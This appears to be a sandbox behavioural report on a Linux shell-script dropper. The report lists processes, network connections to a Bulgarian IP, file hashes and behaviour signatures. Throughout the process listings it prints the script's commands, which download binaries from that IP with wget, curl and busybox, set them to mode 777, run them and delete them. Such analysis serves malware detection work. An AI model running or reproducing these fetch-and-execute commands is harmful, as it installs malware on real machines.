[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/863-1-0xb6721000-0xb6732044-memory.dmp
memory/869-2-0xb6726000-0xb6737044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
